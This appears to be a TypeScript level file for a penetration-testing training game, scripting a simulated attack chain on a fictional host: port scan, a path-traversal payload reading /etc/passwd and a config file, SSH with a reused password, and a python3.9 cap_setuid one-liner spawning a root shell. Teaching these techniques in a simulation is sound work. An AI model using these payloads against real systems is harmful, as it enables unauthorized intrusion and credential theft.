import type { ChainDef } from "../../types";
import { cmd, normalize } from "../../engine";

const IP = "192.0.2.170";

export const hardLevel4: ChainDef = {
  id: "hard-4",
  difficulty: "hard",
  order: 4,
  title: "Target RB03",
  codename: "STANDALONE ASSESSMENT — RB03",
  summary: "A page parameter that loads different content by filename. See how far that goes.",
  briefing: [
    `TARGET: RB03 — ${IP}`,
    "OBJECTIVE: gain a foothold, escalate to root, recover local.txt and proof.txt.",
    "",
    "No further intel provided.",
  ],
  debrief: [
    "root cause: unsanitized path traversal in a page-include parameter (LFI, CWE-22) leaked the",
    "application's own source, which contained a password reused for a real system account's SSH",
    "login — chained into a misconfigured Linux capability (cap_setuid on python3.9) granting",
    "trivial privilege escalation.",
    "",
    "RB03: proof.txt recovered.",
  ],
  nodes: [
    {
      id: "rb03",
      org: "Target RB03",
      city: "Unknown",
      state: "N/A",
      coords: { x: 45, y: 46 },
      ip: IP,
      tagline: "Standalone assessment target",
      briefing: [`IP: ${IP}`, "No further information provided."],
      initialPrompt: "op@breachline:~$",
      motd: [],
      objectives: [
        { id: "recon", label: "Enumerate open services on the target", tactic: "Reconnaissance" },
        { id: "lfi", label: "Exploit local file inclusion to read arbitrary files", tactic: "Discovery", requires: ["recon"] },
        { id: "creds", label: "Recover reused SSH credentials from leaked source", tactic: "Credential Access", requires: ["lfi"] },
        { id: "access", label: "Authenticate over SSH with the recovered credentials", tactic: "Initial Access", requires: ["creds"] },
        { id: "user", label: "Recover local.txt", tactic: "Collection", requires: ["access"] },
        { id: "privesc", label: "Escalate to root via a misconfigured binary capability", tactic: "Privilege Escalation", requires: ["user"] },
        { id: "root", label: "Recover proof.txt", tactic: "Collection", requires: ["privesc"] },
      ],
      hints: [
        "A page parameter that loads different content by filename is worth testing for more than the pages it was designed to show you.",
        "Source code leaks are credential leaks. And once you're on the box properly, check what unusual capabilities are attached to ordinary binaries — not everything dangerous is a SUID bit.",
      ],
      debrief: [],
      commands: [
        cmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP],
          help: "nmap -sV <ip>",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT   STATE SERVICE VERSION",
              "22/tcp open  ssh     OpenSSH 8.9p1",
              "80/tcp open  http    ReportBridge Portal",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 4.10 seconds",
            ],
          }),
        }),
        cmd({
          id: "curl-root",
          tool: "curl",
          requires: [IP],
          forbids: ["view.php"],
          help: "curl http://<ip>",
          requiresObjectives: ["recon"],
          run: () => ({
            tone: "output",
            output: [
              "HTTP/1.1 200 OK",
              "",
              "<title>ReportBridge Portal</title>",
              '<a href="/view.php?page=welcome">Home</a>',
              "",
              "tip: view.php loads a page by name — worth testing what else it'll load.",
            ],
          }),
        }),
        cmd({
          id: "lfi-passwd",
          tool: "curl",
          requires: ["view.php", "etc/passwd"],
          help: 'curl "http://<ip>/view.php?page=../../../../etc/passwd"',
          requiresObjectives: ["recon"],
          run: () => ({
            completesObjective: "lfi",
            tone: "success",
            setsFlags: ["have_lfi"],
            output: [
              "HTTP/1.1 200 OK",
              "",
              "root:x:0:0:root:/root:/bin/bash",
              "rbadmin:x:1001:1001::/home/rbadmin:/bin/bash",
              "www-data:x:33:33::/var/www:/usr/sbin/nologin",
              "",
              "[+] path traversal confirmed — view.php has no bounds on the page= parameter.",
            ],
          }),
        }),
        cmd({
          id: "lfi-config",
          tool: "curl",
          requires: ["view.php", "config.php"],
          help: 'curl "http://<ip>/view.php?page=../../../../var/www/config.php"',
          requiresFlags: ["have_lfi"],
          run: () => ({
            completesObjective: "creds",
            tone: "success",
            setsFlags: ["have_ssh_creds"],
            note: "RB03 — rbadmin SSH password (reused from app config leak): Riverbend#22",
            output: [
              "HTTP/1.1 200 OK",
              "",
              '$db_host = "127.0.0.1";',
              '$db_pass = "Riverbend#22";',
              "",
              "// rbadmin reuses this same password for SSH access — IT ticket #4471, never resolved",
              '$app_pass = "Riverbend#22";',
              "",
              "[+] plaintext credential recovered: rbadmin : Riverbend#22",
            ],
          }),
        }),
        cmd({
          id: "ssh-login",
          tool: "ssh",
          requires: [IP],
          help: "ssh rbadmin@<ip>",
          requiresFlags: ["have_ssh_creds"],
          deniedOutput: ["Permission denied (publickey,password)."],
          run: () => ({
            completesObjective: "access",
            tone: "success",
            promptAfter: "rbadmin@rb03:~$",
            output: ["Authenticated as rbadmin.", "Last login: Mon Nov 4 09:12:41 2024", "", "[+] shell access on RB03."],
          }),
        }),
        cmd({
          id: "cat-local",
          tool: "cat",
          requires: ["local.txt"],
          help: "cat local.txt",
          requiresObjectives: ["access"],
          run: () => ({
            completesObjective: "user",
            tone: "success",
            note: "RB03 — local.txt: e4d909c290d0fb1ca068ffaddf22cbd0",
            output: ["e4d909c290d0fb1ca068ffaddf22cbd0"],
          }),
        }),
        cmd({
          id: "getcap",
          tool: "getcap",
          requires: [],
          help: "getcap -r / 2>/dev/null",
          requiresObjectives: ["user"],
          run: () => ({
            tone: "warn",
            setsFlags: ["saw_cap"],
            output: [
              "/usr/bin/python3.9 = cap_setuid+ep",
              "",
              "note: python3.9 has been granted cap_setuid — it can set its own UID to 0 on request.",
              "this is a documented GTFOBins technique, not a bug in python itself.",
            ],
          }),
        }),
        {
          id: "cap-privesc",
          match: (input) => {
            const n = normalize(input);
            return n.includes("python3") && n.includes("setuid(0)");
          },
          help: 'python3.9 -c \'import os; os.setuid(0); os.system("/bin/bash")\'',
          requiresFlags: ["saw_cap"],
          deniedOutput: ["check what unusual capabilities are attached to binaries on this box first — `getcap -r / 2>/dev/null`."],
          run: () => ({
            completesObjective: "privesc",
            tone: "success",
            setsFlags: ["root_access"],
            output: ["[+] os.setuid(0) succeeded — cap_setuid honored the request with no further check", "[+] root shell spawned"],
          }),
        },
        cmd({
          id: "cat-proof",
          tool: "cat",
          requires: ["proof.txt"],
          help: "cat /root/proof.txt",
          requiresFlags: ["root_access"],
          run: () => ({
            completesObjective: "root",
            tone: "success",
            note: "RB03 — proof.txt: d3d9446802a44259755d38e6d163e820",
            output: ["d3d9446802a44259755d38e6d163e820", "", "RB03: ROOT"],
          }),
        }),
      ],
    },
  ],
};
